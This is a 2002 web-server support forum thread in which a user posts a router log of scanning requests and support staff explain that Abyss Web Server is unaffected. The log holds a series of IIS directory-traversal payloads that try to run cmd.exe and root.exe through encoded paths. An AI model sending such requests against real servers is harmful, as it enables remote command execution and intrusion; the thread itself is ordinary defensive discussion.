View previous topic :: View next topic |
Author |
Message |
feamsr00 -
Joined: 04 Jun 2002 Posts: 138 Location: Phila PA
|
Posted: Sun Oct 13, 2002 5:28 am Post subject: cgi security |
|
|
I have noticed some strange requests for unknown executibles in odd directories. I was notified by my router (witch is also running AWS). The following is a section of the log:
WinRoute - Debug Log
--------------------------------------------------------------------------------
[30/Sep/2002 18:22:21] DNS: query 68.81.145.104:58802 -> 68.80.0.6:53 for mail.earthlink.net
[30/Sep/2002 18:25:12] tmp: 68.81.134.193 -> www GET /scripts/root.exe?/c+dir HTTP/1.0
[30/Sep/2002 18:25:14] tmp: 68.81.134.193 -> www GET /MSADC/root.exe?/c+dir HTTP/1.0
[30/Sep/2002 18:25:15] tmp: 68.81.134.193 -> www GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0
[30/Sep/2002 18:25:16] tmp: 68.81.134.193 -> www GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0
[30/Sep/2002 18:25:17] tmp: 68.81.134.193 -> www GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
[30/Sep/2002 18:25:18] tmp: 68.81.134.193 -> www GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
[30/Sep/2002 18:25:19] tmp: 68.81.134.193 -> www GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
[30/Sep/2002 18:25:20] tmp: 68.81.134.193 -> www GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
[30/Sep/2002 18:25:31] tmp: 68.81.134.193 -> www GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
[30/Sep/2002 18:25:32] tmp: 68.81.134.193 -> www GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
[30/Sep/2002 18:25:34] tmp: 68.81.134.193 -> www GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0
[30/Sep/2002 18:25:38] tmp: 68.81.134.193 -> www GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
[30/Sep/2002 18:25:39] tmp: 68.81.134.193 -> www GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
[30/Sep/2002 18:25:40] tmp: 68.81.134.193 -> www GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
[30/Sep/2002 18:25:42] tmp: 68.81.134.193 -> www GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
[30/Sep/2002 18:25:46] tmp: 68.81.134.193 -> www GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
[30/Sep/2002 18:32:17] DNS: query 68.81.145.104:58806 -> 68.80.0.6:53 for mail.earthlink.net
[30/Sep/2002 18:40:05] DNS: query 68.81.145.104:58809 -> 68.80.0.6:53 for mail.bellatlantic.net
[30/Sep/2002 18:42:20] DNS: query 68.81.145.104:58811 -> 68.80.0.6:53 for mail.earthlink.net
[30/Sep/2002 18:42:29] tmp: 68.81.4.248 -> www GET /scripts/root.exe?/c+dir HTTP/1.0
[30/Sep/2002 18:42:30] tmp: 68.81.4.248 -> www GET /MSADC/root.exe?/c+dir HTTP/1.0
[30/Sep/2002 18:42:30] tmp: 68.81.4.248 -> www GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0
[30/Sep/2002 18:42:32] tmp: 68.81.4.248 -> www GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0
[30/Sep/2002 18:42:32] tmp: 68.81.4.248 -> www GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
[30/Sep/2002 18:42:34] tmp: 68.81.4.248 -> www GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
[30/Sep/2002 18:42:35] tmp: 68.81.4.248 -> www GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
[30/Sep/2002 18:42:36] tmp: 68.81.4.248 -> www GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
[30/Sep/2002 18:52:17] DNS: query 68.81.145.104:58815 -> 68.80.0.6:53 for mail.earthlink.net
[30/Sep/2002 18:52:18] DNS: query 68.81.145.104:58817 -> 68.80.0.6:53 for mail.comcast.net
--------------------------------------------------------------------------------
Only the tmp (temporary packets) are realated to the scan. Even though this happened 13 days ago they always seem to pick up after a few days. I just want to make sure that AWS is not affected whatsoever by this. I am pretty sure that my machine should not be affected by this because I am running AWS on a W98 machine. |
|
Back to top |
|
|
J. Patrick -
Joined: 26 Aug 2002 Posts: 42 Location: Pittsburgh, PA USA
|
Posted: Sun Oct 13, 2002 3:10 pm Post subject: |
|
|
i too have noticed the line
[30/Sep/2002 18:42:32] tmp: 68.81.4.248 -> www GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0
in my Abyss log along with a few other strange line. |
|
Back to top |
|
|
feamsr00 -
Joined: 04 Jun 2002 Posts: 138 Location: Phila PA
|
Posted: Sun Oct 13, 2002 5:04 pm Post subject: |
|
|
It just happened again, right now (1203 EST).I saved it if anyone want a look. |
|
Back to top |
|
|
aprelium -
Joined: 22 Mar 2002 Posts: 6800
|
Posted: Mon Oct 14, 2002 8:39 am Post subject: |
|
|
Someone tried to attack you computer using a serie of malicious HTTP requests. But do not worry, this kind of attacks do not affect Abyss Web Server. It is only known to do trouble on Microsoft IIS/PWS.
The best proof is the access log of AWS. You will find that all these requests were denied (Error code 400 or 404). _________________ Support Team
Aprelium - http://www.aprelium.com |
|
Back to top |
|
|
feamsr00 -
Joined: 04 Jun 2002 Posts: 138 Location: Phila PA
|
Posted: Mon Oct 14, 2002 10:16 pm Post subject: |
|
|
Very nice! :D Thank you.
But this cant be usedin a DOS attack can it (becuse the server still has to formulate the error page)? |
|
Back to top |
|
|
aprelium -
Joined: 22 Mar 2002 Posts: 6800
|
Posted: Tue Oct 15, 2002 1:57 am Post subject: |
|
|
feamsr00 wrote: | Very nice! :D Thank you.
But this cant be usedin a DOS attack can it (becuse the server still has to formulate the error page)? |
No, this cannot be used in a denial of service attack (DOS). The server is still ready to respond to the each request of the attack with an error page. _________________ Support Team
Aprelium - http://www.aprelium.com |
|
Back to top |
|
|
|